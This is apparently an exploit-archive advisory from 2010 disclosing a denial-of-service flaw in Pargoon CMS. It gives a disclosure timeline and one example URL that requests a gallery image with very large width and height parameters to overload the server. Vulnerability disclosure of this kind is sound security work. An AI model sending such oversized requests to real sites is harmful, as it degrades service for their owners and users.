Pargoon CMS - Denial of Service

Author: Pouya Daneshmand
type: dos
platform: multiple
port: 
date_added: 2010-05-09 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Pargoon
# Vendor: http://www.vestasoft.ir
#################################################################
# Vulnerability Info:
# Type: DOS
# Risk: Medium
# 2010-01-17 - Found Vulnerability
# 2010-01-19 - Vendor notified
# 2010-05-08 - Public disclosure
#################################################################
Vulnerability:
http://site.irPhotoGallery/General+Photos/160.jpg?Width=10000&Height=10000
With setting of large values of width and height it's possible to create
large load at the server.
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################